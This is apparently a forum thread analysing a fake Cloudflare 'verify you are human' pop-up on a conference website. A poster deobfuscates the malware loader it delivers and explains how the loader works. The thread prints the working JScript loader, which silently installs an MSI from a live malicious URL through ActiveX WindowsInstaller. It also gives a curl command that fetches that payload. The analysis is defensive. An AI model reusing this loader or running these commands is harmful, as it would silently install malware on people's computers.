Holy shit I just went to check out https://bilconference.com/ to see what it was about and I got this “cloudflare” pop-up to check that I was human, but I’m sure it’s fake and it’s actually a virus that has infected the site because it want’s me to literally run a powershell script that downloads stuff and executes it on my computer.
Seems to be a loader. https://obf-io.deobfuscate.io/ deobfuscates this code into (The names appear to be randomly generated from a wordlist):
function func_OnePlus75() {}
func_OnePlus75();
function func_Palantir_usage07(arg_Splunk37) {}
try {
function func_LG46() {}
func_LG46();
var boosterx = {
gmarket: "UILEVEL",
assword: "https://rtcs.live/ds.php",
p: "InstallProduct"
};
function func_LinkedIn69() {}
func_LinkedIn69();
var adsvery = new ActiveXObject("WindowsInstaller.Installer");
function func_Qualcomm53() {}
func_Qualcomm53();
adsvery.UILEVEL = 2;
function func_VMware13() {}
func_VMware13();
adsvery.InstallProduct("https://rtcs.live/ds.php", "");
function func_Robinhood40() {}
func_Robinhood40();
} catch (p) {
console.error("Keys market LOW", p);
}
function func_traceid_container58() {}
func_traceid_container58();
function func_packetloss_monitor79(arg_token26) {}
{
"9781328";
}
If you remove all dead code this gives a single ActiveX call:
var adsvery = new ActiveXObject("WindowsInstaller.Installer");
adsvery.UILEVEL = 2;
adsvery.InstallProduct("https://rtcs.live/ds.php", "");
You can confirm the decompiler generated the correct URL by running the code in a non-vulnerable engine (e.g. V8) and stubbing the ActiveX implementation like this:
The malicious code tries to use an old Internet Explorer API (the old one, not the modern Chromium Edge) to instanciate a Windows COM object via the ActiveX API, which then is supposed to give access to the Windows Installer infrastructure. This Installer is then invoked to install a (probably malicious) package from the URL specified. Don’t be confused though, this script is not running in a Browser - but instead in the Windows JavaScript host (cscript.exe //E:jscript), a runtime where is ActiveX API is supported.
I suppose this is all some kind of elaborate obfuscation to evade virus detection programs.
Well, however wrote this virus is incompetent - the msiexec payload does not even properly execute because the URL does not properly serve the download. Neither on Windows, nor on Linux (curl --http1.1 -4 -v "https://rtcs.live/ds.php" -H "Connection: Keep-Alive" -H "Accept: */*" -H "User-Agent: Windows Installer" -o virus.msi) . Although I did observe a HTTP 403 Forbidden response when coming from Germany, and a HTTP 404 Not Found when coming from Romania or Brazil, which makes me think there is some additional check (or actual real CloudFlare fronting) going on regarding to where the payload is served.
Anyway, the original URL (https://bilconference.com/) does not even attempt to infect me, nor serve the popup. Maybe some geoblocking is going on (see above) , I even faked my user agent. In any case, you might want to check your browser for malicious add-ons.